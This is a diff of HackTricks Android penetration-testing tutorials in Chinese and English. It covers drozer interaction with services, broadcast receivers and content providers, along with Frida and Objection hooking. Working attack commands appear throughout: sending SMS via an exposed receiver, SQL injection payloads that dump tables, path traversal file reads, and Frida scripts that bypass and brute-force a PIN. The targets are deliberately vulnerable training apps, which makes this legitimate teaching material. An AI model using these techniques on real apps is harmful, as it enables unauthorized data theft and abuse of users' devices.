在代码中**检查**`handleMessage`函数,该函数将**接收**消息:
在代码中**检查**\*\*`handleMessage`\*\*函数,该函数将**接收****消息**
![](<../../../.gitbook/assets/image (82).png>)
@ -171,7 +176,7 @@ Permission: null
com.mwr.example.sieve.CryptoService
Permission: null
```
#### 与服务进行交互
#### **与服务交互**
```bash
app.service.send Send a Message to a service, and display the reply
app.service.start Start Service
@ -179,14 +184,14 @@ app.service.stop Stop Service
```
#### 示例
查看`app.service.send`的**drozer**帮助:
查看 **drozer**`app.service.send` 的帮助:
![](<../../../.gitbook/assets/image (1079).png>)
请注意,您将首先发送数据内的"_msg.what_",然后是"_msg.arg1_"和"_msg.arg2_",您应该检查代码中**使用了哪些信息**以及在哪里使用。\
使用`--extra`选项,您可以发送由"_msg.replyTo"解释的内容,使用`--bundle-as-obj`创建一个包含提供的详细信息的对象。
请注意,您将首先发送 "_msg.what_" 中的数据,然后是 "_msg.arg1_" 和 "_msg.arg2_",您应该检查代码 **使用了哪些信息** 以及在哪里。\
使用 `--extra` 选项,您可以发送由 "_msg.replyTo"_" 解释的内容,使用 `--bundle-as-obj`,您可以创建一个包含提供的详细信息的对象。
在下面的示例中:
下示例中:
* `what == 2354`
* `arg1 == 9234`
@ -201,13 +206,13 @@ run app.service.send com.mwr.example.sieve com.mwr.example.sieve.AuthService --m
**在Android基本信息部分您可以看到什么是广播接收器**。
发现这些广播接收器后,您应该**检查**它们的代码。特别注意**`onReceive`**函数,因为它将处理接收到的消息。
发现这些广播接收器后,您应该**检查它们的代码**。特别注意**`onReceive`**函数,因为它将处理接收到的消息。
#### **检测所有**广播接收器
#### **检测所有** 广播接收器
```bash
run app.broadcast.info #Detects all
```
#### 检查应用程序的广播接收器
#### 检查应用的广播接收器
```bash
#Check one negative
run app.broadcast.info -a jakhar.aseem.diva
@ -228,7 +233,7 @@ Permission: null
com.google.android.apps.youtube.app.application.system.LocaleUpdatedReceiver
Permission: null
```
#### 广播**交互**
#### 广播 **交互**
```bash
app.broadcast.info Get information about broadcast receivers
app.broadcast.send Send broadcast using an intent
@ -236,22 +241,22 @@ app.broadcast.sniff Register a broadcast receiver that can sniff particu
```
#### 发送消息
在这个例子中,通过滥用[FourGoats apk](https://github.com/linkedin/qark/blob/master/tests/goatdroid.apk)的内容提供程序,您可以向任何非高级目的地**发送任意短信****无需**请求用户权限
在这个例子中,利用 [FourGoats apk](https://github.com/linkedin/qark/blob/master/tests/goatdroid.apk) 内容提供者,你可以 **发送任意短信** 到任何非高级目的地 **而无需** 用户的许可
![](<../../../.gitbook/assets/image (415).png>)
![](<../../../.gitbook/assets/image (573).png>)
如果您阅读代码,必须将参数"_phoneNumber_"和"_message_"发送到内容提供程序
如果你阅读代码,参数 "_phoneNumber_" 和 "_message_" 必须发送到内容提供者
```bash
run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats.broadcastreceivers SendSMSNowReceiver --extra string phoneNumber 123456789 --extra string message "Hello mate!"
```
### 是否可调试
生产 APK 永远不应该是可调试的。\
这意味着你可以**附加 Java 调试器**到正在运行的应用程序,实时检查它,设置断点,逐步执行,收集变量值,甚至修改它们。[InfoSec 研究所有一篇优秀的文章](../exploiting-a-debuggeable-applciation.md)关于在应用程序可调试且能够注入运行时代码时深入挖掘
生产APK绝不应该是可调试的。\
这意味着您可以**附加Java调试器**到正在运行的应用程序,实时检查,设置断点,逐步执行,收集变量值甚至更改它们。[InfoSec Institute有一篇优秀的文章](../exploiting-a-debuggeable-applciation.md)关于当您的应用程序可调试时深入挖掘和注入运行时代码
一个应用程序是可调试的时,它会出现在清单文件中
应用程序可调试时它将在Manifest中出现
```xml
<application theme="@2131296387" debuggable="true"
```
@ -272,20 +277,21 @@ run app.package.debuggable
<img src="../../../.gitbook/assets/i3.png" alt="" data-size="original">
**漏洞赏金提示****注册** **Intigriti**,一个由黑客创建的高级**漏洞赏金平台**!立即加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的赏金!
**漏洞赏金提示****注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的赏金!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% hint style="success" %}
学习与实践 AWS 黑客攻击:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客攻击: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

104
mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md
View file

@ -1,36 +1,37 @@
# 利用内容提供程序
# Exploiting Content Providers
## 利用内容提供程序
## Exploiting Content Providers
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>Support HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## 简介
## Intro
数据通过称为**内容提供程序**的组件根据请求从一个应用程序提供给另一个应用程序。这些请求通过**ContentResolver 类**的方法进行管理。内容提供程序可以将其数据存储在各种位置,如**数据库**、**文件**或通过**网络**。
数据是通过一个称为**内容提供者**的组件按请求**从一个应用程序提供给其他应用程序**。这些请求通过**ContentResolver类**的方法进行管理。内容提供者可以将其数据存储在各种位置,例如**数据库**、**文件**或通过**网络**。
_Manifest.xml_ 文件中,需要声明内容提供程序。例如:
_Manifest.xml_文件中内容提供者的声明是必需的。例如:
```xml
<provider android:name=".DBContentProvider" android:exported="true" android:multiprocess="true" android:authorities="com.mwr.example.sieve.DBContentProvider">
<path-permission android:readPermission="com.mwr.example.sieve.READ_KEYS" android:writePermission="com.mwr.example.sieve.WRITE_KEYS" android:path="/Keys"/>
</provider>
```
要访问 `content://com.mwr.example.sieve.DBContentProvider/Keys`,需要 `READ_KEYS` 权限。有趣的是,路径 `/Keys/` 在下面的部分是可访问的,这是因为开发人员的错误,他们保护了 `/Keys` 但声明了 `/Keys/`
要访问 `content://com.mwr.example.sieve.DBContentProvider/Keys`,需要 `READ_KEYS` 权限。值得注意的是,由于开发者的错误,路径 `/Keys/` 在以下部分是可访问的,开发者保护了 `/Keys` 但声明了 `/Keys/`
**也许您可以访问私人数据或利用一些漏洞SQL注入或路径遍历)。**
**也许你可以访问私有数据或利用某些漏洞SQL 注入或路径遍历)。**
## 从**暴露的内容提供者**获取信息
## 从 **暴露的内容提供者** 获取信息
```
dz> run app.provider.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
@ -52,7 +53,7 @@ Content Provider: com.mwr.example.sieve.FileBackupProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
```
可以通过以“_content://_”开头的URI来拼凑出如何访问**DBContentProvider**。这种方法基于使用Drozer获得的见解关键信息位于_/Keys_目录中。
可以通过以“_content://_”开头的URI拼凑出如何到达**DBContentProvider**。这种方法基于使用Drozer获得的见解其中关键信息位于_/Keys_目录中。
Drozer可以**猜测并尝试多个URI**
```
@ -66,28 +67,28 @@ content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
```
你还应该检查**ContentProvider代码**以搜索查询:
您还应该检查 **ContentProvider 代码** 以搜索查询:
![](<../../../.gitbook/assets/image (121) (1) (1) (1).png>)
另外,如果找不到完整的查询,你可以**检查ContentProvider在`onCreate`方法中声明的名称**
此外,如果您找不到完整的查询,您可以 **检查 ContentProvider 在 `onCreate` 方法中声明的名称**
![](<../../../.gitbook/assets/image (564).png>)
查询将类似于:`content://name.of.package.class/declared_name`
查询将类似于: `content://name.of.package.class/declared_name`
## **基于数据库的Content Providers**
## **数据库支持的内容提供者**
很可能大多数Content Providers被用作**数据库**的**接口**。因此,如果你可以访问它,你就可以**提取、更新、插入和删除**信息。\
检查是否可以**访问敏感信息**,或尝试将其更改以**绕过授权**机制。
大多数内容提供者可能作为 **数据库****接口** 使用。因此,如果您可以访问它,您可能能够 **提取、更新、插入和删除** 信息。\
检查您是否可以 **访问敏感信息** 或尝试更改它以 **绕过授权** 机制。
在检查Content Provider的代码时还要查找名为_query、insert、update和delete_的**函数**
在检查内容提供者的代码时 **还要查看** 名为: _query、insert、update 和 delete_**函数**
![](<../../../.gitbook/assets/image (887).png>)
![](<../../../.gitbook/assets/image (254) (1) (1) (1) (1) (1) (1) (1).png>)
因为将能够调用它们
因为将能够调用它们
### 查询内容
```
@ -99,34 +100,34 @@ password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w==
-
email: incognitoguy50@gmail.com
```
### 插入内容
### Insert content
查询数据库,您将了解**列的名称**,然后,您可以将数据插入到数据库中
查询数据库,您将了解**列的名称**,然后,您可以在数据库中插入数据
![](<../../../.gitbook/assets/image (98).png>)
![](<../../../.gitbook/assets/image (173).png>)
_请注意在插入和更新时,您可以使用--string表示字符串--double表示双精度,--float--integer--long--short--boolean_
_请注意在插入和更新中,您可以使用 --string 来指示字符串,--double 来指示双精度,--float--integer--long--short--boolean_
### 更新内容
### Update content
知道列的名称后,您可以**修改条目**
知道列的名称后,您可以**修改条目**
![](<../../../.gitbook/assets/image (780).png>)
### 删除内容
### Delete content
![](<../../../.gitbook/assets/image (423).png>)
### **SQL注入**
### **SQL Injection**
通过操纵传递给内容提供程序的**投影**和**选择字段**可以简单地测试SQL注入**(SQLite)**。\
在查询内容提供程序时,有两个有趣的参数可用于搜索信息_--selection_ 和 _--projection_
通过操纵传递给内容提供者的**投影**和**选择字段**,测试 SQL 注入**SQLite**是简单的。\
查询内容提供者时,有两个有趣的参数可以搜索信息_--selection_ 和 _--projection_
![](<../../../.gitbook/assets/image (784).png>)
您可以尝试**滥用**这些**参数**来测试**SQL注入**
您可以尝试**滥用**这些**参数**来测试**SQL 注入**
```
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
@ -139,7 +140,7 @@ FROM SQLITE_MASTER WHERE type='table';--"
| table | android_metadata | android_metadata | 3 | CREATE TABLE ... |
| table | Passwords | Passwords | 4 | CREATE TABLE ... |
```
**Drozer自动发现SQL注入**
**通过Drozer自动发现SQL注入**
```
dz> run scanner.provider.injection -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
@ -159,27 +160,27 @@ android_metadata
notes
sqlite_sequence
```
## **基于文件系统的内容提供程序**
## **文件系统支持的内容提供者**
内容提供程序也可以用于访问文件:
内容提供者也可以用于**访问文件:**
![](<../../../.gitbook/assets/image (407).png>)
### 读取文件
### 读取**文件**
您可以从内容提供程序中读取文件
您可以从内容提供者读取文件。
```
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1 localhost
```
### **路径遍历**
如果您可以访问文件,可以尝试滥用路径遍历(在这种情况下这并非必要,但您可以尝试使用"_../_"和类似的技巧)。
如果您可以访问文件,您可以尝试利用路径遍历在这种情况下这不是必需的但您可以尝试使用“_../_”和类似的技巧)。
```
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1 localhost
```
**Drozer自动发现路径遍历**
**通过Drozer自动发现路径遍历**
```
dz> run scanner.provider.traversal -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
@ -187,22 +188,23 @@ Vulnerable Providers:
content://com.mwr.example.sieve.FileBackupProvider/
content://com.mwr.example.sieve.FileBackupProvider
```
## 参考资料
## 参考文献
* [https://www.tutorialspoint.com/android/android\_content\_providers.htm](https://www.tutorialspoint.com/android/android\_content\_providers.htm)
* [https://manifestsecurity.com/android-application-security-part-15/](https://manifestsecurity.com/android-application-security-part-15/)
* [https://labs.withsecure.com/content/dam/labs/docs/mwri-drozer-user-guide-2015-03-23.pdf](https://labs.withsecure.com/content/dam/labs/docs/mwri-drozer-user-guide-2015-03-23.pdf)
{% hint style="success" %}
学习与实践 AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想在 HackTricks 中看到您的 **公司广告****下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

72
mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md
View file

@ -1,34 +1,35 @@
# Frida 教程 1
# Frida Tutorial 1
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想在 HackTricks 中看到您的 **公司广告****下载 PDF 版本的 HackTricks**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
**漏洞赏金提示****注册** Intigriti这是一家由黑客创建的高级 **漏洞赏金平台**!立即加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
**漏洞赏金提示****注册** **Intigriti**,一个由黑客为黑客创建的高级 **漏洞赏金平台**!今天就加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
{% embed url="https://go.intigriti.com/hacktricks" %}
**这是帖子的摘要**[https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1](https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1)\
**APK**[https://github.com/t0thkr1s/frida-demo/releases](https://github.com/t0thkr1s/frida-demo/releases)\
**源代码**[https://github.com/t0thkr1s/frida-demo](https://github.com/t0thkr1s/frida-demo)
**这是文章的摘要** [https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1](https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1)\
**APK** [https://github.com/t0thkr1s/frida-demo/releases](https://github.com/t0thkr1s/frida-demo/releases)\
**源代码** [https://github.com/t0thkr1s/frida-demo](https://github.com/t0thkr1s/frida-demo)
## Python
Frida 允许您在运行应用程序的函数中 **插入 JavaScript 代码**。但您可以使用 **python****调用** 钩子,甚至与 **钩子** 进行 **交互**
Frida 允许你在运行的应用程序的函数内部 **插入 JavaScript 代码**。但你可以使用 **python****调用** 钩子,甚至与 **钩子** 进行 **交互**
这是一个简单的 python 脚本,您可以在本教程中的所有示例中使用:
这是一个简单的 python 脚本,你可以与本教程中所有提出的示例一起使用:
```python
#hooking.py
import frida, sys
@ -45,13 +46,13 @@ sys.stdin.read()
```bash
python hooking.py <hookN.js>
```
了解如何使用Python与Frida是很有用的但对于这些示例您也可以直接调用Frida使用命令行frida工具
了解如何将 Python 与 Frida 一起使用是有用的,但对于这些示例,您也可以直接使用命令行 Frida 工具调用 Frida
```bash
frida -U --no-pause -l hookN.js -f infosecadventures.fridademo
```
## Hook 1 - 布尔值绕过
## Hook 1 - Boolean Bypass
在这里您可以看到如何从类_infosecadventures.fridademo.utils.PinUtil_中**hook**一个**布尔值**方法_checkPin_
在这里你可以看到如何**hook**一个**boolean**方法 (_checkPin_) 来自类: _infosecadventures.fridademo.utils.PinUtil_
```javascript
//hook1.js
Java.perform(function() {
@ -67,12 +68,14 @@ return true;
```
python hooking.py hook1.js
```
查看:该函数接收一个字符串作为参数,是否需要重载?
## Hook 2 - 函数暴力破解
### 非静态函数
如果要调用类的非静态函数,**首先需要一个实例**。然后,您可以使用该实例来调用函数。\
为此,您可以**查找现有实例**并使用它:
如果你想调用一个类的非静态函数,你**首先需要一个该类的实例**。然后,你可以使用该实例来调用该函数。\
为此,你可以**找到一个现有的实例**并使用它:
```javascript
Java.perform(function() {
console.log("[ * ] Starting PIN Brute-force, please wait...");
@ -90,9 +93,11 @@ onComplete: function() { }
});
});
```
在这种情况下,这不起作用,因为没有任何实例,并且该函数是静态的。
### 静态函数
如果函数是静态的,可以直接调用它:
如果函数是静态的,可以直接调用它:
```javascript
//hook2.js
Java.perform(function () {
@ -109,7 +114,7 @@ console.log("[ + ] Found correct PIN: " + i);
```
## Hook 3 - 检索参数和返回值
您可以钩住一个函数,并让它**打印**传递的**参数值**和返回值的值:
您可以钩住一个函数并使其**打印** **传递的参数**的值和**返回值**的值:
```javascript
//hook3.js
Java.perform(function() {
@ -127,26 +132,27 @@ return encrypted_ret;
```
## 重要
在本教程中,您使用方法名称和 _.implementation_ 钩住了方法。但是如果有**多个具有相同名称的方法**,您需要**指定要钩住的方法**并指示**参数的类型**。
在本教程中,您使用方法名称和 _.implementation_ 钩住了方法。但是如果有 **多个同名方法**,您需要 **指定要钩住的方法****指明参数的类型**。
您可以在[下一个教程](frida-tutorial-2.md)中看到。
您可以在 [下一个教程](frida-tutorial-2.md) 中看到这一点
<figure><img src="../../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
**漏洞赏金提示****注册**Intigriti这是一家由黑客创建的高级**漏洞赏金平台**!立即加入我们,访问[**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的赏金!
**漏洞赏金提示****注册** **Intigriti**,这是一个由黑客为黑客创建的高级 **漏洞赏金平台**!今天就加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

122
mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md
View file

@ -1,36 +1,37 @@
# Objection 教程
# Objection Tutorial
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
- 如果您想在 HackTricks 中看到您的 **公司广告****下载 PDF 版本的 HackTricks**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
- 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<img src="../../../.gitbook/assets/i3.png" alt="" data-size="original">
**漏洞赏金提示****注册** Intigriti这是一家由黑客创建的高级 **漏洞赏金平台**!立即加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
**漏洞赏金提示****注册** **Intigriti**,一个由黑客为黑客创建的高级 **漏洞赏金平台**!今天就加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
{% embed url="https://go.intigriti.com/hacktricks" %}
## **介绍**
**objection - 运行时移动应用探索**
**objection - 运行时移动探索**
[**Objection**](https://github.com/sensepost/objection) 是一个由 [Frida](https://www.frida.re) 驱动的运行时移动应用探索工具包。它的目的是帮助评估移动应用及其安全状况,而无需越狱或 root 移动设备。
[**Objection**](https://github.com/sensepost/objection) 是一个运行时移动探索工具包,由 [Frida](https://www.frida.re) 提供支持。它的目的是帮助评估移动应用程序及其安全态势,而无需越狱或获取根权限的移动设备。
**注意:** 这不是某种越狱 / root 绕过。通过使用 `objection`,您仍然受到适用沙盒强制执行的所有限制。
